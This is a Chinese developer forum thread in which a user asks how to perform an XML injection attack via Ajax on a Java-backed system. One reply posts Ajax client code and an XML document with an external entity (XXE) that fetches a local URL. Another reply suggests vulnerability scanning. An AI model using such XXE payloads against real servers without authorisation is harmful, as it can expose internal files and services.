52,797
社区成员
发帖
与我相关
我的任务
分享求助! 如何用Ajax实现xml注入攻击
系统界面如图,这个系统是基于Ajax的,后台用java写的,怎么样才能在这个系统中实现xml注入攻击?
跪求大神解决!!
...全文
请发表友善的回复…
发表回复
qq_23264809 2016-05-24
- 打赏
- 举报
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="textml; charset=utf-8" />
<title>AJAX</title>
</head>
<body>
<script type="text/javascript">
var xmlHttp=null;
function readyStateChangeHandle()
{
if(xmlHttp.readyState==4)
{
if(xmlHttp.status==200)
{
var xmlDOM=xmlHttp.responseXML;
var xmlRoot=xmlDOM.documentElement;
try
{
var xmlItem=xmlRoot.getElementsByTagName("name");
alert(xmlItem[0].firstChild.data);
}
catch(e)
{
alert(e.message);
}
}
}
}
function ajaxRequest()
{
if(window.XMLHttpRequest)
{
xmlHttp=new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlHttp.onreadystatechange=readyStateChangeHandle;
xmlHttp.open("GET","data2.xml",true);
xmlHttp.send(null);
}
</script>
<input type="button" onclick="ajaxRequest()" value="AJAX" />
</body>
<html>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xee [
<!ELEMENT name ANY>
<!ENTITY xee SYSTEM "http://localhost:8080/ajax/123.txt">]>
<root>
<name>&xee;</name>
</root>
Go 旅城通票 2016-05-24
- 打赏
- 举报
别人要是没有这个漏洞怎么攻击,自己找个扫描软件扫描下就知道了,如webscan.360.cn漏洞扫描,xss漏洞会被扫描出来
